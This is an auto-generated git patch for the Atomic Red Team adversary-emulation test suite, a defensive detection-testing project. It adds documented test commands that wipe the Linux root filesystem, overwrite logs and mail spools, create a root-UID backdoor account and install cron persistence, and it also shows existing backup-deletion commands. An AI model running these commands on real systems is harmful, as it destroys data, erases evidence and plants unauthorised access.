From 895c6f2d4fb5cd2d3ea12c75b37f832aea261362 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 5 Feb 2019 21:05:01 +0000 Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master --- atomics/T1070/T1070.md | 40 ++++++++++ atomics/T1107/T1107.md | 19 ++++- atomics/T1136/T1136.md | 22 ++++++ atomics/T1168/T1168.md | 40 +++++++--- atomics/index.md | 14 +++- atomics/index.yaml | 171 +++++++++++++++++++++++++++++++++++------ atomics/linux-index.md | 14 +++- atomics/macos-index.md | 10 ++- 8 files changed, 285 insertions(+), 45 deletions(-) diff --git a/atomics/T1070/T1070.md b/atomics/T1070/T1070.md index 7d79875b..b3b14332 100644 --- a/atomics/T1070/T1070.md +++ b/atomics/T1070/T1070.md @@ -26,6 +26,10 @@ Logs may also be cleared through other mechanisms, such as [PowerShell](https:// - [Atomic Test #3 - rm -rf](#atomic-test-3---rm--rf) +- [Atomic Test #4 - Overwrite Linux Mail Spool](#atomic-test-4---overwrite-linux-mail-spool) + +- [Atomic Test #5 - Overwrite Linux Log](#atomic-test-5---overwrite-linux-log) +
@@ -72,3 +76,39 @@ rm -rf /private/var/log/system.log* rm -rf /private/var/audit/* ```
+
+ +## Atomic Test #4 - Overwrite Linux Mail Spool +This test overwrites the Linux mail spool of a specified user. This technique was used by threat actor Rocke during the exploitation of Linux web servers. + +**Supported Platforms:** Linux + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| username | Username of mail spool | String | root| + +#### Run it with `bash`! +``` +echo 0> /var/spool/mail/#{username} +``` +
+
+ +## Atomic Test #5 - Overwrite Linux Log +This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux web servers. + +**Supported Platforms:** Linux + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| log_path | Path of specified log | Path | /var/log/secure| + +#### Run it with `bash`! +``` +echo 0> #{log_path} +``` +
diff --git a/atomics/T1107/T1107.md b/atomics/T1107/T1107.md index bdcb58c2..b72842d2 100644 --- a/atomics/T1107/T1107.md +++ b/atomics/T1107/T1107.md @@ -28,6 +28,8 @@ There are tools available from the host operating system to perform cleanup, but - [Atomic Test #11 - wbadmin](#atomic-test-11---wbadmin) +- [Atomic Test #12 - Delete Filesystem - Linux](#atomic-test-12---delete-filesystem---linux) +
@@ -184,7 +186,7 @@ wmic shadowcopy delete
## Atomic Test #10 - bcdedit -xxx +This test leverages `bcdedit` to remove boot-time recovery measures. **Supported Platforms:** Windows @@ -198,7 +200,7 @@ bcdedit /set {default} recoveryenabled no
## Atomic Test #11 - wbadmin -xxx +This test deletes Windows Backup catalogs. **Supported Platforms:** Windows @@ -208,3 +210,16 @@ xxx wbadmin delete catalog -quiet ```
+
+ +## Atomic Test #12 - Delete Filesystem - Linux +This test deletes the entire root filesystem of a Linux system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment. + +**Supported Platforms:** Linux, CentOS, Ubuntu + + +#### Run it with `bash`! +``` +rm -rf / --no-preserve-root > /dev/null 2> /dev/null +``` +
diff --git a/atomics/T1136/T1136.md b/atomics/T1136/T1136.md index 55c3b8ec..a696863c 100644 --- a/atomics/T1136/T1136.md +++ b/atomics/T1136/T1136.md @@ -14,6 +14,8 @@ The net user commands can be used to create a local or domain accou - [Atomic Test #4 - Create a new user in PowerShell](#atomic-test-4---create-a-new-user-in-powershell) +- [Atomic Test #5 - Create a new user in Linux with `root` UID and GID.](#atomic-test-5---create-a-new-user-in-linux-with-root-uid-and-gid) +
@@ -95,3 +97,23 @@ New-LocalUser -Name #{username} -NoPassword net user /add #{username} ```
+
+ +## Atomic Test #5 - Create a new user in Linux with `root` UID and GID. +Creates a new user in Linux and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign. + +**Supported Platforms:** Linux + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| username | Username of the user to create | String | butter| +| password | Password of the user to create | String | BetterWithButter| + +#### Run it with `bash`! +``` +useradd -o -u 0 -g 0 -M -d /root -s /bin/bash #{username} +echo "#{password}" | passwd --stdin #{username} +``` +
diff --git a/atomics/T1168/T1168.md b/atomics/T1168/T1168.md index b81a35e6..0010420e 100644 --- a/atomics/T1168/T1168.md +++ b/atomics/T1168/T1168.md @@ -18,15 +18,17 @@ Each launchd job is described by a different configuration property list (plist) ## Atomic Tests -- [Atomic Test #1 - Cron Job](#atomic-test-1---cron-job) +- [Atomic Test #1 - Cron - Replace crontab with referenced file](#atomic-test-1---cron---replace-crontab-with-referenced-file) -- [Atomic Test #2 - Cron Job](#atomic-test-2---cron-job) +- [Atomic Test #2 - Cron - Add script to cron folder](#atomic-test-2---cron---add-script-to-cron-folder) + +- [Atomic Test #3 - Event Monitor Daemon Persistence](#atomic-test-3---event-monitor-daemon-persistence)
-## Atomic Test #1 - Cron Job -Set a cron job +## Atomic Test #1 - Cron - Replace crontab with referenced file +This test replaces the current user's crontab file with the contents of the referenced file. This technique was used by numerous IoT automated exploitation attacks. **Supported Platforms:** macOS, CentOS, Ubuntu, Linux @@ -34,17 +36,37 @@ Set a cron job #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| script | Script to execute | path | /tmp/evil.sh| +| command | Command to execute | string | /tmp/evil.sh| +| tmp_cron | Temporary reference file to hold evil cron schedule | path | /tmp/persistevil| -#### Run it with `sh`! +#### Run it with `bash`! ``` -echo "* * * * * #{script}" > /tmp/persistevil && crontab /tmp/persistevil +echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} ```

-## Atomic Test #2 - Cron Job -Manually set a cron job +## Atomic Test #2 - Cron - Add script to cron folder +This test adds a script to a cron folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. + +**Supported Platforms:** macOS, CentOS, Ubuntu, Linux + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| command | Command to execute | string | echo 'Hello from Atomic Red Team' > /tmp/atomic.log| +| cron_script_name | Name of file to store in cron folder | string | persistevil| + +#### Run it with `bash`! +``` +echo "#{command}" > /etc/cron.daily/#{cron_script_name} +``` +
+
+ +## Atomic Test #3 - Event Monitor Daemon Persistence +This test adds persistence via a plist to execute via the macOS Event Monitor Daemon. **Supported Platforms:** macOS, CentOS, Ubuntu, Linux diff --git a/atomics/index.md b/atomics/index.md index 6b18f9d6..5452054d 100644 --- a/atomics/index.md +++ b/atomics/index.md @@ -38,6 +38,7 @@ - Atomic Test #2: Create a user account on a MacOS system [macos] - Atomic Test #3: Create a new user in a command prompt [windows] - Atomic Test #4: Create a new user in PowerShell [windows] + - Atomic Test #5: Create a new user in Linux with `root` UID and GID. [linux] - T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1157 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1133 External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -72,8 +73,9 @@ - [T1152 Launchctl](./T1152/T1152.md) - Atomic Test #1: Launchctl [macos] - [T1168 Local Job Scheduling](./T1168/T1168.md) - - Atomic Test #1: Cron Job [macos, centos, ubuntu, linux] - - Atomic Test #2: Cron Job [macos, centos, ubuntu, linux] + - Atomic Test #1: Cron - Replace crontab with referenced file [macos, centos, ubuntu, linux] + - Atomic Test #2: Cron - Add script to cron folder [macos, centos, ubuntu, linux] + - Atomic Test #3: Event Monitor Daemon Persistence [macos, centos, ubuntu, linux] - T1162 Login Item [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1037 Logon Scripts](./T1037/T1037.md) - Atomic Test #1: Logon Scripts [windows] @@ -198,6 +200,7 @@ - Atomic Test #9: Delete VSS - wmic [windows] - Atomic Test #10: bcdedit [windows] - Atomic Test #11: wbadmin [windows] + - Atomic Test #12: Delete Filesystem - Linux [linux, centos, ubuntu] - [T1222 File Permissions Modification](./T1222/T1222.md) - Atomic Test #1: Take ownership using takeown utility [windows] - Atomic Test #2: Take ownership recursively using takeown utility [windows] @@ -246,6 +249,8 @@ - Atomic Test #1: Clear Logs [windows] - Atomic Test #2: FSUtil [windows] - Atomic Test #3: rm -rf [macos, linux] + - Atomic Test #4: Overwrite Linux Mail Spool [linux] + - Atomic Test #5: Overwrite Linux Log [linux] - [T1202 Indirect Command Execution](./T1202/T1202.md) - Atomic Test #1: Indirect Command Execution - pcalua.exe [windows] - Atomic Test #2: Indirect Command Execution - forfiles.exe [windows] @@ -541,8 +546,9 @@ - [T1152 Launchctl](./T1152/T1152.md) - Atomic Test #1: Launchctl [macos] - [T1168 Local Job Scheduling](./T1168/T1168.md) - - Atomic Test #1: Cron Job [macos, centos, ubuntu, linux] - - Atomic Test #2: Cron Job [macos, centos, ubuntu, linux] + - Atomic Test #1: Cron - Replace crontab with referenced file [macos, centos, ubuntu, linux] + - Atomic Test #2: Cron - Add script to cron folder [macos, centos, ubuntu, linux] + - Atomic Test #3: Event Monitor Daemon Persistence [macos, centos, ubuntu, linux] - [T1170 Mshta](./T1170/T1170.md) - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows] - [T1086 PowerShell](./T1086/T1086.md) diff --git a/atomics/index.yaml b/atomics/index.yaml index bcd4d04a..a871736a 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml @@ -1156,6 +1156,27 @@ persistence: command: | New-LocalUser -Name #{username} -NoPassword net user /add #{username} + - name: Create a new user in Linux with `root` UID and GID. + description: 'Creates a new user in Linux and adds the user to the `root` group. + This technique was used by adversaries during the Butter attack campaign. + +' + supported_platforms: + - linux + input_arguments: + username: + description: Username of the user to create + type: String + default: butter + password: + description: Password of the user to create + type: String + default: BetterWithButter + executor: + name: bash + command: |- + useradd -o -u 0 -g 0 -M -d /root -s /bin/bash #{username} + echo "#{password}" | passwd --stdin #{username} T1158: technique: id: attack-pattern--dc27c2ec-c5f9-4228-ba57-d67b590bda93 @@ -2125,8 +2146,10 @@ persistence: created: '2017-12-14T16:46:06.044Z' identifier: T1168 atomic_tests: - - name: Cron Job - description: 'Set a cron job + - name: Cron - Replace crontab with referenced file + description: 'This test replaces the current user''s crontab file with the contents + of the referenced file. This technique was used by numerous IoT automated + exploitation attacks. ' supported_platforms: @@ -2135,17 +2158,23 @@ persistence: - ubuntu - linux input_arguments: - script: - description: Script to execute - type: path + command: + description: Command to execute + type: string default: "/tmp/evil.sh" + tmp_cron: + description: Temporary reference file to hold evil cron schedule + type: path + default: "/tmp/persistevil" executor: - name: sh - command: 'echo "* * * * * #{script}" > /tmp/persistevil && crontab /tmp/persistevil + name: bash + command: 'echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} ' - - name: Cron Job - description: 'Manually set a cron job + - name: Cron - Add script to cron folder + description: 'This test adds a script to a cron folder configured to execute + on a schedule. This technique was used by the threat actor Rocke during the + exploitation of Linux web servers. ' supported_platforms: @@ -2153,6 +2182,28 @@ persistence: - centos - ubuntu - linux + input_arguments: + command: + description: Command to execute + type: string + default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log + cron_script_name: + description: Name of file to store in cron folder + type: string + default: persistevil + executor: + name: bash + command: 'echo "#{command}" > /etc/cron.daily/#{cron_script_name} + +' + - name: Event Monitor Daemon Persistence + description: "This test adds persistence via a plist to execute via the macOS + Event Monitor Daemon. \n" + supported_platforms: + - macos + - centos + - ubuntu + - linux executor: name: manual steps: | @@ -5354,7 +5405,7 @@ defense-evasion: ' - name: bcdedit - description: 'xxx + description: 'This test leverages `bcdedit` to remove boot-time recovery measures. ' supported_platforms: @@ -5365,15 +5416,28 @@ defense-evasion: bcdedit /set {default} bootstatuspolicy ignoreallfailures bcdedit /set {default} recoveryenabled no - name: wbadmin - description: 'xxx - -' + description: "This test deletes Windows Backup catalogs. \n" supported_platforms: - windows executor: name: command_prompt command: 'wbadmin delete catalog -quiet +' + - name: Delete Filesystem - Linux + description: 'This test deletes the entire root filesystem of a Linux system. + This technique was used by Amnesia IoT malware to avoid analysis. This test + is dangerous and destructive, do NOT use on production equipment. + +' + supported_platforms: + - linux + - centos + - ubuntu + executor: + name: bash + command: 'rm -rf / --no-preserve-root > /dev/null 2> /dev/null + ' T1222: technique: @@ -6535,6 +6599,39 @@ defense-evasion: command: | rm -rf /private/var/log/system.log* rm -rf /private/var/audit/* + - name: Overwrite Linux Mail Spool + description: 'This test overwrites the Linux mail spool of a specified user. + This technique was used by threat actor Rocke during the exploitation of Linux + web servers. + +' + supported_platforms: + - linux + input_arguments: + username: + description: Username of mail spool + type: String + default: root + executor: + name: bash + command: 'echo 0> /var/spool/mail/#{username} + +' + - name: Overwrite Linux Log + description: 'This test overwrites the specified log. This technique was used + by threat actor Rocke during the exploitation of Linux web servers. + +' + supported_platforms: + - linux + input_arguments: + log_path: + description: Path of specified log + type: Path + default: "/var/log/secure" + executor: + name: bash + command: 'echo 0> #{log_path}' T1202: technique: id: attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e @@ -14998,8 +15095,10 @@ execution: created: '2017-12-14T16:46:06.044Z' identifier: T1168 atomic_tests: - - name: Cron Job - description: 'Set a cron job + - name: Cron - Replace crontab with referenced file + description: 'This test replaces the current user''s crontab file with the contents + of the referenced file. This technique was used by numerous IoT automated + exploitation attacks. ' supported_platforms: @@ -15008,17 +15107,23 @@ execution: - ubuntu - linux input_arguments: - script: - description: Script to execute - type: path + command: + description: Command to execute + type: string default: "/tmp/evil.sh" + tmp_cron: + description: Temporary reference file to hold evil cron schedule + type: path + default: "/tmp/persistevil" executor: - name: sh - command: 'echo "* * * * * #{script}" > /tmp/persistevil && crontab /tmp/persistevil + name: bash + command: 'echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} ' - - name: Cron Job - description: 'Manually set a cron job + - name: Cron - Add script to cron folder + description: 'This test adds a script to a cron folder configured to execute + on a schedule. This technique was used by the threat actor Rocke during the + exploitation of Linux web servers. ' supported_platforms: @@ -15026,6 +15131,28 @@ execution: - centos - ubuntu - linux + input_arguments: + command: + description: Command to execute + type: string + default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log + cron_script_name: + description: Name of file to store in cron folder + type: string + default: persistevil + executor: + name: bash + command: 'echo "#{command}" > /etc/cron.daily/#{cron_script_name} + +' + - name: Event Monitor Daemon Persistence + description: "This test adds persistence via a plist to execute via the macOS + Event Monitor Daemon. \n" + supported_platforms: + - macos + - centos + - ubuntu + - linux executor: name: manual steps: | diff --git a/atomics/linux-index.md b/atomics/linux-index.md index a144b8f1..fb3823f5 100644 --- a/atomics/linux-index.md +++ b/atomics/linux-index.md @@ -10,6 +10,7 @@ - Atomic Test #3: Firefox [linux, windows, macos] - [T1136 Create Account](./T1136/T1136.md) - Atomic Test #1: Create a user account on a Linux system [linux] + - Atomic Test #5: Create a new user in Linux with `root` UID and GID. [linux] - [T1158 Hidden Files and Directories](./T1158/T1158.md) - Atomic Test #1: Create a hidden file in a hidden directory [linux, macos] - Atomic Test #3: Hidden file [macos, linux] @@ -17,8 +18,9 @@ - Atomic Test #10: Create hidden directories and files [macos, linux] - T1215 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1168 Local Job Scheduling](./T1168/T1168.md) - - Atomic Test #1: Cron Job [macos, centos, ubuntu, linux] - - Atomic Test #2: Cron Job [macos, centos, ubuntu, linux] + - Atomic Test #1: Cron - Replace crontab with referenced file [macos, centos, ubuntu, linux] + - Atomic Test #2: Cron - Add script to cron folder [macos, centos, ubuntu, linux] + - Atomic Test #3: Event Monitor Daemon Persistence [macos, centos, ubuntu, linux] - T1205 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1166 Setuid and Setgid](./T1166/T1166.md) @@ -153,6 +155,7 @@ - Atomic Test #1: Delete a single file - Linux/macOS [linux, macos] - Atomic Test #2: Delete an entire folder - Linux/macOS [linux, macos] - Atomic Test #3: Overwrite and delete a file with shred [linux] + - Atomic Test #12: Delete Filesystem - Linux [linux, centos, ubuntu] - [T1222 File Permissions Modification](./T1222/T1222.md) - Atomic Test #8: chmod - Change file or folder mode (numeric mode) [macos, linux] - Atomic Test #9: chmod - Change file or folder mode (symbolic mode) [macos, linux] @@ -174,6 +177,8 @@ - T1066 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1070 Indicator Removal on Host](./T1070/T1070.md) - Atomic Test #3: rm -rf [macos, linux] + - Atomic Test #4: Overwrite Linux Mail Spool [linux] + - Atomic Test #5: Overwrite Linux Log [linux] - [T1130 Install Root Certificate](./T1130/T1130.md) - Atomic Test #1: Install root CA on CentOS/RHEL [linux] - [T1036 Masquerading](./T1036/T1036.md) @@ -203,8 +208,9 @@ - T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1061 Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1168 Local Job Scheduling](./T1168/T1168.md) - - Atomic Test #1: Cron Job [macos, centos, ubuntu, linux] - - Atomic Test #2: Cron Job [macos, centos, ubuntu, linux] + - Atomic Test #1: Cron - Replace crontab with referenced file [macos, centos, ubuntu, linux] + - Atomic Test #2: Cron - Add script to cron folder [macos, centos, ubuntu, linux] + - Atomic Test #3: Event Monitor Daemon Persistence [macos, centos, ubuntu, linux] - [T1064 Scripting](./T1064/T1064.md) - Atomic Test #1: Create and Execute Bash Shell Script [macos, linux] - [T1153 Source](./T1153/T1153.md) diff --git a/atomics/macos-index.md b/atomics/macos-index.md index e99dd6a4..de022769 100644 --- a/atomics/macos-index.md +++ b/atomics/macos-index.md @@ -28,8 +28,9 @@ - [T1152 Launchctl](./T1152/T1152.md) - Atomic Test #1: Launchctl [macos] - [T1168 Local Job Scheduling](./T1168/T1168.md) - - Atomic Test #1: Cron Job [macos, centos, ubuntu, linux] - - Atomic Test #2: Cron Job [macos, centos, ubuntu, linux] + - Atomic Test #1: Cron - Replace crontab with referenced file [macos, centos, ubuntu, linux] + - Atomic Test #2: Cron - Add script to cron folder [macos, centos, ubuntu, linux] + - Atomic Test #3: Event Monitor Daemon Persistence [macos, centos, ubuntu, linux] - T1162 Login Item [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1037 Logon Scripts](./T1037/T1037.md) - Atomic Test #2: Logon Scripts - Mac [macos] @@ -105,8 +106,9 @@ - [T1152 Launchctl](./T1152/T1152.md) - Atomic Test #1: Launchctl [macos] - [T1168 Local Job Scheduling](./T1168/T1168.md) - - Atomic Test #1: Cron Job [macos, centos, ubuntu, linux] - - Atomic Test #2: Cron Job [macos, centos, ubuntu, linux] + - Atomic Test #1: Cron - Replace crontab with referenced file [macos, centos, ubuntu, linux] + - Atomic Test #2: Cron - Add script to cron folder [macos, centos, ubuntu, linux] + - Atomic Test #3: Event Monitor Daemon Persistence [macos, centos, ubuntu, linux] - [T1064 Scripting](./T1064/T1064.md) - Atomic Test #1: Create and Execute Bash Shell Script [macos, linux] - [T1153 Source](./T1153/T1153.md)